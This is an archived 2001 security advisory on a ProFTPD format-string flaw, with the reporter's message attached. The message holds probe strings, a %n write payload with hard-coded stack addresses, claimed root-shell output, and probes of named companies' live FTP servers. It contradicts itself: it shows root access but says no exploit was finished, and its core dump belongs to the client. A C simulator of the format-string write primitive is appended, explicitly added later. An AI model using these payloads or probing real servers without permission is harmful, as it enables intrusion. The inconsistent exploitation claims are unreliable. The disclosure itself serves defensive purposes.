SecurityTracker.com
Category:  Application (File Transfer)  >  ProFTPD
Vendors:  ProFTPd.net
ProFTPD Site and Quote Commands May Allow Remote Users to Execute Arbitrary Commands on the Server
Date:  Aug 4 2001 03:23 (UTC/GMT)
Impact:  Execution of arbitrary code via network, User access via network
Version(s): 1.2.1-2wl and some prior versions
Description:  A vulnerability has been reported in ProFTPD that may allow a remote user with authorized FTP access (including anonymous access) to execute arbitrary code on the server with the privileges of the server. The author of the report indicates that this vulnerability may affect other FTP servers.

The format string vulnerability can reportedly be triggered via the 'site' command and the 'quote' command.

The 'site' command bug reportedly affects ProFTPD 1.2.1-2wl Server (Redhat) [7.1]

The 'quote' command bug reportedly affects the following versions:

ProFTPD 1.2.0pre10 Server (Debian) [orange],
ProFTPD 1.2.0rc2-1kr2 (Redhat) [7.0],
ProFTPD 1.2.1-2wl Server (Redhat) [7.1].

A remote user can use the following type of command to trigger the vulnerability:

site AAAA%x%x%x%x%x%x%x%x%x%x
quote AAAA%x%x%x%x%x%x%x%x%x%x

If the '%x' directives are expanded, the 500 reply echoes stack contents as hex and the 'AAAA' marker reappears as 41414141 at some position in the output; if the reply quotes the directives back unchanged, the report treats that server as unaffected. Note that the core file shown in the source message after 'site AAAA...%n' is identified by 'file' as belonging to the 'ftp' client process, and the reporter states that a working exploit was not completed.

The vendor has been notified.

This vulnerability is reportedly the same as, or similar to, the previously reported wu-ftpd 'site exec' format string vulnerability.

The author reports that other FTP servers may also be affected; the report's 'quote' test list also includes an OpenBSD FTP server (Version 6.5).

Impact:  A remote user with authorized FTP access (including anonymous access) may be able to execute arbitrary code on the server with the privileges of the server.
Solution:  No solution was available at the time of this entry.
Vendor URL:  www.proftpd.net
Cause:  Input validation error
Underlying OS:  Linux (Any), UNIX (Any)
Reported By:  "you dong-hun" <szoahc@hotmail.com>
Message History:   None.


 Source Message Contents

Date:  Thu, 02 Aug 2001 10:41:41 -0400
From:  "you dong-hun" <szoahc@hotmail.com>
Subject:  hey~ new!! remote format string bug...

 

 A remote format string attack using the FTPD "site" command and the "quote" command.
                                                 - Discoverer: Xpl017Elz (Korean) -

 site command bug:
 Versions tested directly: ProFTPD 1.2.1-2wl Server (Redhat) [7.1],
                           most servers on which executing the "site" command is possible in ftp.

 quote command bug:
 Versions tested directly: ProFTPD 1.2.0pre10 Server (Debian) [orange],
                           ProFTPD 1.2.0rc2-1kr2 (Redhat) [7.0],
                           ProFTPD 1.2.1-2wl Server (Redhat) [7.1],
                           FTP server (Version 6.5/OpenBSD),
                           most servers on which executing the "quote" command is possible in ftp.

 [x82@www tmp]$ ./bugtestfile
 input: AAAA%x%x%x%x
 output: AAAA414141417825782578257825a <--- Through this part, the format string stored in the stack area appears.

 [x82@www tmp]$
 [x82@www tmp]$ (printf "\x41\x41\x41\x41\x9c\xf2\xff\xbf\x41\x41\x41\x41\x9e\xf2\xff\xbf%%64848c%%n%%49823c%%n";cat) | ./bugtestfile
 ... ... A ... omission ... ... ...
 whoami
 root
 id
 uid=999(x82) gid=999(x82) euid=0(root) groups=999(x82),10(wheel)

 This is the scene of acquiring root privileges using this kind of format string attack.

 A format string vulnerability using the "site exec" command in wu-ftpd has already been announced. The writer's vulnerability did not exist, and I tried the test on other ftp servers. As a result:

 bash-2.04$ ftp 127.0.0.1
 Connected to 127.0.0.1.
 220 BCB1COOL Server (FORMAT STRING BUG SERVER) [xxx.bugserver.com]
 500 AUTH not understood.
 500 AUTH not understood.
 KERBEROS_V4 rejected as an authentication type
 Name (127.0.0.1:x82): x82
 331 Password required for x82.
 Password:
 230 User x82 logged in.
 Remote system type is UNIX.
 Using binary mode to transfer files.
 ftp> site AAAA%x%x%x%x%x%x%x%x%x%x
 500 'SITE AAAA806C1A527FA805164828057650BFFFE9C4BFFFC190455449534141412025782541' not understood.

 414141 ~ was displayed at the ninth position.

 ftp> quote AAAA%x%x%x%x%x%x%x%x%x%x
 500 AAAA806C1A627FF805164828057650BFFFE9C4BFFFC190414141417825782578257825 not understood.

 41414141 was displayed at the eighth position.

 ftp>
 ftp> site AAAA%x%x%x%x%x%x%x%x%n <--- Using the %n pointer, a core dump happened.
 Segmentation fault (core dumped)
 bash-2.04$
 bash-2.04$ cat /etc/redhat-release
 WOWLiNUX Release 7.1 (Paran)
 bash-2.04$ uname -a
 Linux xxx.bugserver.com 2.4.2-2wl #1 Thu Mar 16 05:21:58 KST 2001 i686 unknown
 bash-2.04$
 bash-2.04$ file core
 core: ELF 32-bit LSB core file of 'ftp' (signal 11), Intel 80386, version 1, from 'ftp'

 Normal case:
 ftp> site AAAA%x%x%x%x%x%x%x%x%x%n
 ftp> 500 'SITE AAAA%X%X%X%X%X%X%X%X%X%n' not understood.

 An ftp server that shows this result has no vulnerability.

 eggshell address: 0xbffffa28
 ex> quote \....................%8x%8x%8x%8x%8x%8x%8x%8x..............%n....................%n
 ex> site "\....................%8x%8x%8x%8x%8x%8x%8x%8x%8x...........%n....................%n"
 uname -a
 Linux xxx.bugserver.com 2.4.2-2wl #1 Thu Mar ...
 whoami
 root
 id
 uid=0(root) gid=0(root) groups=0(root)

 The same result may be possible if the following conditions are met:
 1. You must find the position of the address you want to overwrite, that is, the return address.
 2. You must calculate the address of the shellcode to jump to.
 3. The calculations necessary overall, that is, the conditions under which the format string can be constructed.

 If it is a server that operates FTP, most seem to have this vulnerability. I tried the test on some domestic companies.

 netian.com
 ftp> quote AAAA%x%x%x%x%x%x%x%x%x%x
 500 AAAA7800BBAA10072B81008820056F3E84141414178257825782578257825782578257825 not understood.

 dreamwiz.com
 ftp> quote AAAA%x%x%x%x%x%x%x%x%x%x
 500 AAAA7800BBAA10072B81008820056F3E84141414178257825782578257825782578257825 not understood.

 nbci.com
 ftp> quote AAAA%x%x%x%x%x%x%x%x%x%x
 500 'AAAA7800BBAA10072B81008820056F3E84141414178257825782578257825782578257825': command not understood.

 There seem to be many places where the vulnerability is detected. A problem occurs in the environment for making the exploit, and the work is stopped. The exploit has not been completed up to now. Perhaps it can be given to other hackers who have the ability. Although this vulnerability is triggered when using ftp on Windows at present, on Linux there were places that passed and places that did not. It is the same as wu-ftp, in that a format string vulnerability exists. Accordingly, someone must come up with a plan or security measure as quickly as possible, before the exploit comes out.

 Because I am not an American, my English is not good. Thanks to all who have read this far. :-)
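The probe strings in the advisory ('site AAAA%x%x...') and the three conditions the reporter lists above (find the position at which the marker comes back, put the address to overwrite there, then use padding such as %8x or %64848c so that %n writes the wanted count) are the standard format-string procedure. The following simulator carries that procedure out deterministically over a constructed 32-bit stack. It is an added example written for this archive page, not code from the report's author, from SecurityTracker or from ProFTPD: it models a vulnerable printf(user_buf) whose buffer lies inside the varargs window, and the filler words, the buffer's word index (7, chosen so the marker returns at the eighth %x as in the report) and the writable range 0xbffff000-0xc0000000 are assumptions, not measurements of any real ftpd.

```c
/* Simulator for the bug class in the report: a user-controlled command
 * buffer reaches printf() as the format and the buffer itself sits on the
 * stack inside the varargs window. Added example for this archive page, not
 * code from the report's author, SecurityTracker or ProFTPD; every stack
 * value, index and address range below is constructed. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define STACK_WORDS 24
#define WRITABLE_LO 0xbffff000u   /* assumed writable stack range */
#define WRITABLE_HI 0xc0000000u

typedef struct {
    uint32_t words[STACK_WORDS];  /* words[0] is what the first %x reads */
    uint32_t n_target, n_value;   /* where the last %n wrote, and what */
    int n_writes, faulted;        /* %n count; 1 if a %n hit unmapped memory */
} sim_t;

/* Fake frame: filler words (saved registers, locals), then the user buffer
 * copied little-endian from word index buf_word onward. */
static void build_stack(sim_t *s, const char *user_buf, int buf_word)
{
    memset(s, 0, sizeof *s);
    for (int i = 0; i < buf_word && i < STACK_WORDS; i++)
        s->words[i] = 0x08050000u + 0x1000u * (uint32_t)i;        /* constructed */
    size_t len = strlen(user_buf);
    for (size_t i = 0; i < len && buf_word + (int)(i / 4) < STACK_WORDS; i++)
        s->words[buf_word + i / 4] |= (uint32_t)(unsigned char)user_buf[i] << (8 * (i % 4));
}

/* Interpret fmt as printf would, pulling "arguments" from s->words. Handles
 * literal text and %[width](x|c|n|%), which covers every probe in the report. */
static int sim_printf(sim_t *s, const char *fmt, char *out, size_t outlen)
{
    int arg = 0, n = 0; size_t o = 0;
    for (const char *p = fmt; *p; p++) {
        if (*p != '%') { if (o + 1 < outlen) out[o++] = *p; n++; continue; }
        int width = 0;
        while (p[1] >= '0' && p[1] <= '9') width = width * 10 + (*++p - '0');
        char conv = *++p;
        if (conv == '\0') break;
        if (conv == '%') { if (o + 1 < outlen) out[o++] = '%'; n++; continue; }
        uint32_t v = arg < STACK_WORDS ? s->words[arg] : 0; arg++;  /* next "argument" */
        if (conv == 'x') {
            char tmp[16];
            int w = snprintf(tmp, sizeof tmp, "%*x", width, (unsigned)v);
            int c = w < (int)sizeof tmp ? w : (int)sizeof tmp - 1;
            if (o + (size_t)c < outlen) { memcpy(out + o, tmp, (size_t)c); o += (size_t)c; }
            n += w;
        } else if (conv == 'c') {
            n += width > 1 ? width : 1;   /* %64848c: padding only moves the count */
        } else if (conv == 'n') {         /* writes the count through the "argument" */
            s->n_writes++; s->n_target = v; s->n_value = (uint32_t)n;
            if (v < WRITABLE_LO || v >= WRITABLE_HI) { s->faulted = 1; break; }
        }
    }
    out[o] = '\0';
    return n;
}

/* Offset discovery, done by eye in the report ("41414141 was displayed at the
 * eighth position"): send AAAA plus k "%x" until the last word printed is the
 * marker. Returns that k, or -1 if it never shows up. */
static int find_marker_offset(int buf_word)
{
    for (int k = 1; k <= STACK_WORDS; k++) {
        char probe[256] = "AAAA", out[512];
        for (int i = 0; i < k; i++) strcat(probe, "%x");
        sim_t s;
        build_stack(&s, probe, buf_word);
        sim_printf(&s, probe, out, sizeof out);
        size_t len = strlen(out);
        if (len >= 8 && strcmp(out + len - 8, "41414141") == 0) return k;
    }
    return -1;
}

/* Write primitive: the target address replaces the marker, %8x pads up to the
 * discovered offset and %n writes the byte count there. Returns the value
 * written, or -1 when the %n faults, which is what the report's
 * "site AAAA...%n" crash shows: 0x41414141 is not a mapped address.
 * The address must contain no NUL or '%' byte, since it travels in a C string. */
static long sim_write(int buf_word, int offset, uint32_t target)
{
    char probe[256], out[512];
    for (int i = 0; i < 4; i++) probe[i] = (char)((target >> (8 * i)) & 0xff);
    probe[4] = '\0';
    for (int i = 1; i < offset; i++) strcat(probe, "%8x");
    strcat(probe, "%n");
    sim_t s;
    build_stack(&s, probe, buf_word);
    sim_printf(&s, probe, out, sizeof out);
    return (s.n_writes == 1 && !s.faulted) ? (long)s.n_value : -1;
}

int main(void)
{
    int off = find_marker_offset(7);                       /* 8 with this layout */
    printf("marker returns at %%x number %d\n", off);
    printf("%%n at that offset wrote %ld to 0xbffff29c\n", sim_write(7, off, 0xbffff29cu));
    printf("%%n aimed at 0x41414141 -> %ld (fault)\n", sim_write(7, off, 0x41414141u));
    return 0;
}
```

With the buffer at word 7 the marker comes back at the eighth %x, and a %n there writes 4 + 7*8 = 60 bytes' worth of count to the address planted in place of AAAA; the report's real payload plants two addresses and uses %64848c and %49823c so that the two %n writes land chosen 16-bit halves, which is exactly the count arithmetic this simulator exposes. The fix on the server side is the usual one: never pass user text as the format argument, i.e. printf("%s", buf) rather than printf(buf).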


Copyright 2001, SecurityGlobal.net LLC